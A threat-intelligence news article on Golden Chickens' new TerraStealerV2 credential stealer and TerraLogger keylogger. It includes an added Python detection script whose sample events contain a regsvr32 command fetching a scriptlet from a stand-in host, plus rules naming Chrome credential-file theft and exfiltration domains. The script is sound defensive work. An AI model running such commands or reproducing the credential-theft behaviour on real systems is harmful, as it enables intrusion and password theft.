
A prolific malware-for-hire gang with ties to billion-dollar breaches has just dropped two new digital weapons designed to jack your passwords and loot your crypto wallets.
A notorious cybercriminal gang known for renting out malware to some of the most prolific hacking crews on the planet has released two new tools. The intent is crystal clear: steal your logins, drain your crypto, and watch every word you type.
Between January and April 2025, threat researchers at Insikt Group uncovered two new malware strains, TerraStealerV2 and TerraLogger.
Ten tracked samples of malware are tied to the Golden Chickens malware-as-a-service (MaaS) operation, also tracked as Venom Spider.
TerraStealerV2 is designed to harvest browser-stored credentials and cryptocurrency wallet data, while TerraLogger is a classic keylogger, quietly recording every keystroke on an infected machine.
They’re part of a new arsenal developed by Golden Chickens, a malware-as-a-service (MaaS) syndicate also known as Venom Spider. Both tools appear to be in early stages of development. They do not yet exhibit the level of stealth typically associated with Golden Chickens tooling.
“Given Golden Chickens’ history of developing malware for credential theft and access operations, these capabilities will likely continue to evolve,” the researchers write.
How does the new malware work?
TerraStealerV2 targets the Chrome “Login Data” database to collect saved passwords and browser extension information.
However, it fails to bypass Application Bound Encryption (ABE), a Chrome security feature introduced in mid-2024 that encrypts credentials at the system level.
This suggests that the malware is either outdated or not yet production-ready. Once installed, it exfiltrates data through Telegram and a suspicious file transfer domain: wetransfers[.]io. The malware is delivered to infected machines in multiple file formats, including LNK, MSI, DLL, and EXE.
It also abuses legitimate Windows utilities like regsvr32.exe and mshta.exe to stay hidden. These tools, normally used for system administration or script execution, are frequently abused to evade detection by endpoint protection platforms.
In contrast, TerraLogger functions as a standalone module. It sets a low-level hook to capture keystrokes and logs them locally. There is no exfiltration component or command-and-control communication, which suggests it is one component of a modular payload meant to be paired with more sophisticated tools.
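A defender-side illustration of the behaviours described above, added here and not taken from the Insikt Group report: a small Python rule set run over constructed, simplified Sysmon-style telemetry. It flags regsvr32.exe or mshta.exe launched with a URL or a user-writable path, a non-browser process reading Chrome's "Login Data" file, and DNS lookups for the wetransfers[.]io exfiltration domain. The sample events, file paths and the lure.invalid URL are constructed, and api.telegram.org is an assumption about how the Telegram channel would appear in DNS logs.

```python
import re

# Constructed sample telemetry (not from the Insikt Group report): simplified
# Sysmon-style records, one per line, "key=value" fields separated by " | ".
# EVT=1 process creation, EVT=11 file access, EVT=22 DNS query.
SAMPLE_EVENTS = [
    "EVT=1 | Image=C:\\Windows\\System32\\regsvr32.exe | CommandLine=regsvr32.exe /s /i:https://lure.invalid/x.sct scrobj.dll | Parent=C:\\Windows\\explorer.exe",
    "EVT=1 | Image=C:\\Windows\\System32\\regsvr32.exe | CommandLine=regsvr32.exe /s C:\\Program Files\\Vendor\\plugin.dll | Parent=C:\\Windows\\System32\\msiexec.exe",
    "EVT=1 | Image=C:\\Windows\\System32\\mshta.exe | CommandLine=mshta.exe C:\\Users\\u\\AppData\\Local\\Temp\\invoice.hta | Parent=C:\\Windows\\explorer.exe",
    "EVT=11 | Image=C:\\Users\\u\\AppData\\Roaming\\svc.exe | Target=C:\\Users\\u\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data",
    "EVT=11 | Image=C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe | Target=C:\\Users\\u\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data",
    "EVT=22 | Image=C:\\Users\\u\\AppData\\Roaming\\svc.exe | Query=wetransfers.io",
    "EVT=22 | Image=C:\\Program Files\\Mozilla Firefox\\firefox.exe | Query=wetransfer.com",
]

# wetransfers.io is the exfiltration domain named in the report; api.telegram.org
# is an assumption about how "exfiltration through Telegram" would look in DNS.
EXFIL_DOMAINS = {"wetransfers.io", "api.telegram.org"}
LOLBINS = {"regsvr32.exe", "mshta.exe"}
URL_OR_USER_PATH = re.compile(r"https?://|\\(AppData|Temp|Downloads|Users\\Public)\\", re.I)

def parse(line):
    """Turn one 'k=v | k=v' record into a dict (values may contain spaces)."""
    return dict(field.split("=", 1) for field in line.split(" | "))

def check(ev):
    """Return the name of the first rule an event matches, or None."""
    image = ev.get("Image", "").rsplit("\\", 1)[-1].lower()
    if ev["EVT"] == "1" and image in LOLBINS:
        # regsvr32/mshta loading content from a URL or a user-writable path
        if URL_OR_USER_PATH.search(ev.get("CommandLine", "")):
            return "lolbin_remote_or_user_path"
    if ev["EVT"] == "11" and image != "chrome.exe":
        # a non-browser process touching Chrome's saved-credential database
        if ev.get("Target", "").lower().endswith("\\login data"):
            return "chrome_login_data_nonbrowser"
    if ev["EVT"] == "22" and ev.get("Query", "").lower() in EXFIL_DOMAINS:
        return "exfil_domain_dns"
    return None

def scan(lines):
    """Return (line_index, rule) for every record that trips a rule."""
    hits = []
    for i, line in enumerate(lines):
        rule = check(parse(line))
        if rule:
            hits.append((i, rule))
    return hits
```

Note that the lookalike wetransfer.com lookup in the last sample is deliberately left unflagged: only the exact domain from the report is matched, so a production rule would need its own allow-list review rather than substring matching.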
Who is Golden Chickens?
Golden Chickens has spent the past seven years building a reputation as a reliable malware vendor.
Since at least 2018, the group’s malware has been deployed by prolific threat actors like Russian-linked FIN6 and Cobalt Group, as well as Belarusian Evilnum. That trio alone is responsible for billions in damages from cyberattacks on airlines, retailers, and financial institutions globally.
Golden Chickens’ known toolkit ecosystem includes:
- VenomLNK: A malicious Windows shortcut file used for initial access
- TerraLoader: A malware loader for deploying additional payloads
- TerraTV: Designed to hijack TeamViewer sessions
- TerraCrypt: For ransomware deployment
- TerraRecon and TerraWiper: Reconnaissance and data destruction
- more_eggs: A backdoor malware
- Lite_more_eggs: A lightweight version of more_eggs used as a loader, written in JavaScript
Tools developed by the Golden Chickens syndicate have been weaponized in several campaigns, including high-profile attacks on British Airways, Newegg, and Ticketmaster UK.
eSentire’s Threat Response Unit has tied Golden Chickens to a threat actor known as badbullzvenom, a persona believed to be jointly controlled by individuals based in Moldova and Montreal, Canada.